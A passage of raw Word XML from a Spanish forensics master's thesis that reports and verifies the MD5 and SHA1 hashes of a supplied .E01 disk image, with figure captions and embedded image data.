                <v:shape id="Imagen 67" o:spid="_x0000_s1167" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente con confianza media" style="position:absolute;width:35966;height:8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nu1zAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BbsIw&#10;EETvlfoP1lbigsAhlNIGDAKqInoAAe0HrOIliYjXUWxIytfXlZB63J2Zt7PTeWtKcaXaFZYVDPoR&#10;COLU6oIzBd9fH71XEM4jaywtk4IfcjCfPT5MMdG24QNdjz4TAcIuQQW591UipUtzMuj6tiIO2snW&#10;Bn0Y60zqGpsAN6WMo+hFGiw4XMixolVO6fl4MQq6WXz+XL7rJm6Xb3u8rbe7sd8q1XlqFxMQnlr/&#10;b76nNzrUHwVk9DwcD+Hvp7AAOfsFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAPD57tcwA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                  <v:imagedata r:id="rId201" o:title="Texto&#10;&#10;Descripción generada automáticamente con confianza media"/>
                </v:shape>
                <v:shape id="_x0000_s1168" type="#_x0000_t202" style="position:absolute;left:37211;top:1669;width:1676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6sdzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsZuksdjYbSlFQb0UYy/eHtnXbDT7Nuxu2vjvXUHwOMzMN8xqM9lenMiHzrGCfJaB&#10;IG6c7rhVcHh/ur0HESKyxt4xKfimAJv15cUKK+3O/EanOrYiQThUqMDEOFRShsaQxTBzA3Hyjs5b&#10;jEn6VmqP5wS3vSyybCEtdpwWDA60M9R81aNVsC8/9uZmPD6+bsu5fzmMu8VnWyt1fTVtH0BEmuJ/&#10;+K/9rBUUd/k8Xy7LAn4vpTsg1z8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEARA+rHcwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="370F666C" w14:textId="758CB860" w:rsidR="0058388E" w:rsidRPr="00B34393" w:rsidRDefault="0058388E" w:rsidP="0058388E">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>44</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="113" w:name="_Toc155782611"/>
                        <w:r w:rsidRPr="008638C3">
                          <w:t>Hash del Disco Duro.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="113"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En el presente TFM, se nos ha proporcionado a los alumnos un archivo de captura de disco duro en formato </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.E01</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Por otro lado, se nos ha proporcionado los resúmenes o </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en MD5 y en SHA1 de los archivos tal y como se muestra en la siguiente imagen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C21CD" w14:textId="27617159" w:rsidR="00FF4835" w:rsidRPr="00FF4835" w:rsidRDefault="00FF4835" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155754896 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XXI. Comando hash MD5 y SHA1 del disco duro.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41480843" w14:textId="1D8C1130" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como Podemos ver, los </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="0053404D" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hashes: Plural de hash."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resúmenes del archivo del HDD, tememos los siguientes hashes en MD5 y en SHA1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7D56E" w14:textId="1D3A2994" w:rsidR="00A703AB" w:rsidRPr="0053404D" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MD5:</w:t>
      </w:r>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>324ed7db769620e3fb55c027480d0ef3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3BAA0" w14:textId="019F641F" w:rsidR="00A703AB" w:rsidRPr="0053404D" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0053404D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>3398f90d2438230aaaf7b5e8ce0a01e456d9ca10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE8542" w14:textId="2EEAB2F7" w:rsidR="00A703AB" w:rsidRPr="001D7290" w:rsidRDefault="009A067C" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>No reitero lo indicado en los apuntes en de la asignatura, puesto que ya está indicado. De modo que procedero directamente a los calculos de hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3674FC2A" w14:textId="5AD0B833" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="009A067C" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251824128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B75F47A" wp14:editId="4C342220">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324869</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5803309" cy="1166495"/>
                <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="607884275" name="Grupo 48"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5803309" cy="1166495"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5803309" cy="1166495"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="916509565" name="Imagen 68" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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11220" cy="1166495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1832024142" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3530009" y="329610"/>
                            <a:ext cx="2273300" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4FF67107" w14:textId="2A99C14F" w:rsidR="0058388E" w:rsidRPr="00A944F7" w:rsidRDefault="0058388E" w:rsidP="0058388E">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>45</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="114" w:name="_Toc155782612"/>
                              <w:r w:rsidRPr="00106E80">
                                <w:t>Calculo de Hash con PowerShell.</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75F47A" id="Grupo 48" o:spid="_x0000_s1169" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:25.6pt;width:456.95pt;height:91.85pt;z-index:251824128;mso-position-horizontal:center;mso-position-horizontal-relative:margin" coordsize="58033,11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&#10;iy5yW2+9dTKm5+hY2X2jRo3yban+1o4